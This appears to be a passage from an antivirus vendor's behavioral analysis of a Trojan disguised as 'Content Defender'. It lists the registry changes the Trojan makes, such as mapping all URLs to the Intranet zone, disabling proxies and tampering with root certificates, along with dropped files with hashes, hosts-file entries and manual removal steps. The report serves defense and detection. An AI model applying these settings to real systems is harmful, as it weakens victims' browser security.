[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\ec805d4411149c36848938d5e82f6aff\DEBUG]
"Trace Level"
The process verclsid.exe:1272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 42 1D B0 AB DB 5A 91 2D F8 C4 B6 8E 62 F7 6B"
The process cd.exe:1200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 7D 28 FA C9 65 38 B4 84 DB 05 B7 59 BD 41 AB"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0]
"(Default)" = "ContentDefenderLib"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\0\win32]
"(Default)" = "%Program Files%\Content Defender\cd.exe"
[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService" = "cd"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Content Defender"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"(Default)" = "%Program Files%\Content Defender\cd.exe"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}]
"(Default)" = "IDefenderControl"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"ServerExecutable" = "%Program Files%\Content Defender\cd.exe"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}]
"(Default)" = "DefenderControl Class"
The Trojan deletes the following value(s) in system registry:
[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService"
The process cd.exe:532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\99602BB894425BD59B9291BC32B4657BC8C362A8]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 99 60 2B B8"
[HKLM\SOFTWARE\ContentDefender]
"Installed" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\ContentDefender]
"ff" = "yes"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D AD 8E 73 10 B4 E0 DC A3 90 E9 98 B1 A5 44 15"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"99602BB894425BD59B9291BC32B4657BC8C362A8"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process ASIns.exe:388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"pname" = "AS"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 CB 3D CA 95 AB 6C B4 C5 4C 6E 84 71 D8 EA 9F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies]
"(Default)" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
3c85a37a54db8567fb49454f1e843995 | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys |
14a2aef6aff5a438acace9c1d1b09ab8 | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\tdi__i386.sys |
2662a31ffc8565492a0492ae90ac52d7 | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys |
39d01796ee492a83b113c0b4e42029df | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys |
bb403a2ec69885a71c23b54a4681c6ab | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys |
09fdb4dc6d10d90e1022605271b410b6 | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys |
c9a57b85b5e3525eb12a5f8842ec31af | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe |
83a06ef0da07004ff083e4f8d883f5d0 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll |
0cf3fffe01b3e10170252060e384992d | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\cd.exe |
f2b8f4dd1537bed0eab1af1a685385a3 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\condefclean.exe |
1f4aa52cda820a6673d51a29625ab27c | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\import_root_cert.exe |
99d21c17565ec8a20fcdc90b6b842bf7 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\libeay32.dll |
5888b9054f889d4f94091f68049eac82 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nfregdrv.exe |
a6c4a86a016cf62b949546a4629072b0 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\certutil.exe |
c2bd7f2bda94f7c4f2c4cee0413c38a3 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll |
61a1f11a8d031c525636d67bf6378e16 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll |
a5a8f547c982af1da2a34aa717b00a0d | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\nss3.dll |
036abc7576e02be68480c57a7dc60010 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\plc4.dll |
6117994e7e30bf20ad42f81cf486f5e7 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\plds4.dll |
044213f6a4c6ced0e8d935587657066a | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\smime3.dll |
47b4d529901fdcccc9f46d8c64ebda6d | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll |
6b9dfbfcc91ba1dcb86ea1f8d3ee259b | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ssleay32.dll |
d1c64eb593b7c75caa1f720b20fcbfca | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe |
f228f6dba41ee23f4a4fa6a94720126e | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll |
7752b437c2f8ab242d206f4fff7d898d | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\cd.exe |
ab32d5d764d252be947747807cf19b47 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\condefclean.exe |
9072f540831eb094de5826a73ca899da | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\import_root_cert.exe |
3464bc076d7d6fcd19fd50ebd19f5741 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\31F03376-17B9-4185-A6B6-3F7E5BFAF610\condefsetup (19).exe |
3c85a37a54db8567fb49454f1e843995 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys |
14a2aef6aff5a438acace9c1d1b09ab8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys |
2662a31ffc8565492a0492ae90ac52d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys |
39d01796ee492a83b113c0b4e42029df | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys |
bb403a2ec69885a71c23b54a4681c6ab | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys |
09fdb4dc6d10d90e1022605271b410b6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys |
c9a57b85b5e3525eb12a5f8842ec31af | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe |
83a06ef0da07004ff083e4f8d883f5d0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll |
0cf3fffe01b3e10170252060e384992d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\cd.exe |
f2b8f4dd1537bed0eab1af1a685385a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe |
1f4aa52cda820a6673d51a29625ab27c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe |
99d21c17565ec8a20fcdc90b6b842bf7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll |
5888b9054f889d4f94091f68049eac82 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe |
a6c4a86a016cf62b949546a4629072b0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe |
c2bd7f2bda94f7c4f2c4cee0413c38a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll |
61a1f11a8d031c525636d67bf6378e16 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll |
a5a8f547c982af1da2a34aa717b00a0d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll |
036abc7576e02be68480c57a7dc60010 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll |
6117994e7e30bf20ad42f81cf486f5e7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll |
044213f6a4c6ced0e8d935587657066a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll |
47b4d529901fdcccc9f46d8c64ebda6d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll |
6b9dfbfcc91ba1dcb86ea1f8d3ee259b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll |
d1c64eb593b7c75caa1f720b20fcbfca | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe |
f228f6dba41ee23f4a4fa6a94720126e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll |
7752b437c2f8ab242d206f4fff7d898d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\cd.exe |
ab32d5d764d252be947747807cf19b47 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe |
9072f540831eb094de5826a73ca899da | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe |
bc1f19367a5e597ebdf2f1b357ab9f8e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll |
012d3afc8d4c07bc639970aa3d16bd75 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe |
7dc4abffeb842ced0a4b8c340f85cec3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe |
7b2aedbd790196a04d37eb9ce3e79858 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll |
2875e121662118df6711ccacc59a5e91 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll |
78bffb8f373269b174e6b125b556009b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll |
6d6487a060f245818c5ffdf5c92c3326 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll |
371182686c722038a05c6df300dbae37 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll |
ffacc094cc51ec7ea40e04963050859f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll |
007473ce8c0e03b7d851d1620af113f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll |
73eaf0ffe4f1e3d66a4dccbfb00579a4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll |
14a2aef6aff5a438acace9c1d1b09ab8 | c:\WINDOWS\system32\drivers\condef.sys |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 841 bytes in size. The following strings are added to the hosts file listed below:
127.0.0.1 | down.baidu2016.com |
127.0.0.1 | 123.sogou.com |
127.0.0.1 | www.czzsyzgm.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
condefsetup (19).exe:1984
verclsid.exe:1272
cd.exe:1200
cd.exe:532
ASIns.exe:388 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\cd.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%System%\drivers\condef.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
